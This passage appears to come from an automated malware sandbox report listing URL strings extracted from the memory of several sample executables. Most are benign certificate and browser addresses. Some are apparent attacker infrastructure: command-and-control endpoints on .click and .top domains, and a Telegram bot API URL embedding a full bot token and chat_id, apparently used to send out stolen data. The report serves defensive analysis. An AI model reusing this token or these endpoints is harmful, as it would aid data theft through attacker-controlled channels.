                              Source: cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                              Source: cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                              Source: cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                              Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                              Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                              Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                              Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                              Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB17
                              Source: b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850
                              Source: b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                              Source: b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY
                              Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: http://html4/loose.dtd
                              Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                              Source: cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                              Source: cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                              Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                              Source: fed209a298.exe, 00000018.00000000.3107118176.0000000000423000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
                              Source: cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                              Source: cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                              Source: cd2469328d.exe, 0000000B.00000003.2611942159.000000000357C000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2613062845.000000000357A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691063624.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691395033.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531502589.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3528793955.000000000610E000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531742688.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626433817.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626713720.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3627288446.00000000054F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: cc6f25572f.exe, 00000011.00000003.2765724677.000001D6698FC000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766911611.000001D6698FC000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2765856821.000001D6698FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
                              Source: cc6f25572f.exe, 00000010.00000002.2886690972.000002B0C3880000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2917808778.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919515707.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919171490.000001D66990D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/
                              Source: cc6f25572f.exe, 00000011.00000000.2740743202.00007FF735960000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: https://api.telegram.org/bot
                              Source: cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1AF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o
                              Source: cc6f25572f.exe, 00000011.00000002.2919515707.000001D669972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=74270
                              Source: cc6f25572f.exe, 00000010.00000002.2888013323.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000010.00000000.2731872890.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000002.2972181574.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000000.2740743202.00007FF735960000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: https://api.telegram.org/botFailed
                              Source: cc6f25572f.exe, 00000010.00000002.2886690972.000002B0C3880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/f)i
                              Source: cc6f25572f.exe, 00000010.00000002.2886690972.000002B0C3880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/n)a
                              Source: cc6f25572f.exe, 00000011.00000002.2919171490.000001D66990D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/ogle
                              Source: cd2469328d.exe, 0000000B.00000003.2663747077.0000000003531000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3652093995.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796121165.00000000055AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                              Source: 5cda6c90d7.exe, 0000000C.00000003.2766963059.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2800855972.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838754343.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2802169090.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2795190281.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815002242.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2767444886.0000000005E4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&k
                              Source: cd2469328d.exe, 0000000B.00000002.2793903700.0000000003530000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3652093995.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796121165.00000000055AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                              Source: cd2469328d.exe, 0000000B.00000003.2611942159.000000000357C000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2613062845.000000000357A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691063624.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691395033.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531502589.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3528793955.000000000610E000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531742688.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626433817.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626713720.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3627288446.00000000054F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: cd2469328d.exe, 0000000B.00000003.2611942159.000000000357C000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2613062845.000000000357A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691063624.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691395033.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531502589.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3528793955.000000000610E000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531742688.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626433817.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626713720.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3627288446.00000000054F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: cd2469328d.exe, 0000000B.00000003.2611942159.000000000357C000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2613062845.000000000357A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691063624.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691395033.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531502589.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3528793955.000000000610E000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531742688.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626433817.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626713720.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3627288446.00000000054F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: 5cda6c90d7.exe, 0000000C.00000003.2795190281.0000000005E41000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2800638240.000000000181A000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000002.2870509764.0000000001789000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838471636.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2659546736.00000000017DA000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2766424937.0000000005E47000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2859043534.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2659069201.00000000017BB000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2860709107.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815170543.000000000181B000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000002.2872169437.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2767444886.0000000005E46000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2801888516.000000000181D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/
                              Source: 5cda6c90d7.exe, 0000000C.00000003.2800638240.000000000181A000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838471636.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815170543.000000000181B000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2801888516.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2774023966.000000000181A000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2773670606.0000000001810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/%
                              Source: 5cda6c90d7.exe, 0000000C.00000003.2659442912.00000000017A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/33
                              Source: 5cda6c90d7.exe, 0000000C.00000003.2838471636.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815170543.000000000181B000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2801888516.000000000181D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/E
                              Source: 5cda6c90d7.exe, 0000000C.00000002.2870509764.00000000017B9000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2814852148.000000000182D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838471636.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2860832487.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2659546736.00000000017DA000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2859043534.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2659069201.00000000017BB000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2860709107.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815170543.000000000181B000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838873029.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000002.2872096119.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000002.2872169437.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2801888516.000000000181D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2774023966.000000000181A000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815170543.000000000182D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838471636.000000000182D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2773670606.0000000001810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/api
                              Source: 5cda6c90d7.exe, 0000000C.00000003.2659069201.00000000017BB000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2773819917.00000000017B9000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2635795252.00000000017BB000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2773960939.00000000017BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/api8
                              Source: 5cda6c90d7.exe, 0000000C.00000003.2659546736.00000000017DA000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2659069201.00000000017BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/apiu
                              Source: 5cda6c90d7.exe, 0000000C.00000003.2659546736.00000000017DA000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2659069201.00000000017BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/apiw
                              Source: 5cda6c90d7.exe, 0000000C.00000003.2860832487.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000002.2872096119.00000000017D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/apiz2
                              Source: 5cda6c90d7.exe, 0000000C.00000002.2878360728.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2766963059.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2800855972.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838754343.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2802169090.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741012427.0000000005E31000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741357547.0000000005E32000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2795190281.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815002242.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2767444886.0000000005E4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click:443/api
                              Source: 5cda6c90d7.exe, 0000000C.00000003.2800855972.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838754343.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2802169090.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2795190281.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815002242.0000000005E4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click:443/apibW4Wyy
                              Source: 5cda6c90d7.exe, 0000000C.00000002.2878360728.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838754343.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815002242.0000000005E4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click:443/apipref(
                              Source: 5cda6c90d7.exe, 0000000C.00000002.2870509764.00000000017B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click:443/apiy
                              Source: cc6f25572f.exe, 00000011.00000003.2766911611.000001D6698F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.goo2
                              Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                              Source: cc6f25572f.exe, 00000010.00000003.2756924171.000002B0C1B4A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2754299828.000002B0C1B19000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2754614693.000002B0C1B36000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2756665074.000002B0C1B43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore%
                              Source: cc6f25572f.exe, 00000011.00000003.2767408832.000001D66991F000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766984113.000001D66991A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLC
                              Source: cc6f25572f.exe, 00000010.00000003.2756451385.000002B0C1B21000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2756608703.000002B0C1B27000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2755467748.000002B0C1B21000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2756871989.000002B0C1B2E000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2754299828.000002B0C1B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreR
                              Source: cc6f25572f.exe, 00000010.00000003.2756451385.000002B0C1B21000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2756608703.000002B0C1B27000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2755467748.000002B0C1B21000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2756871989.000002B0C1B2E000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2754299828.000002B0C1B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstorec
                              Source: cc6f25572f.exe, 00000011.00000003.2766797750.000001D669919000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstorecC
                              Source: chrome.exe, 00000024.00000003.3307931299.00001D5C002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000024.00000003.3307959777.00001D5C002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                              Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                              Source: cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767237610.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767999680.000001D66992A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxE0D7
                              Source: cc6f25572f.exe, 00000011.00000003.2767999680.000001D669920000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767408832.000001D66991F000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766984113.000001D66991A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxw
                              Source: cd2469328d.exe, 0000000B.00000003.2663747077.0000000003531000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3652093995.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796121165.00000000055AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                              Source: cd2469328d.exe, 0000000B.00000002.2793903700.0000000003530000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2766963059.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2800855972.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838754343.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2802169090.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2795190281.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815002242.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2767444886.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3652093995.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796121165.00000000055AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                              Source: b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
                              Source: b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
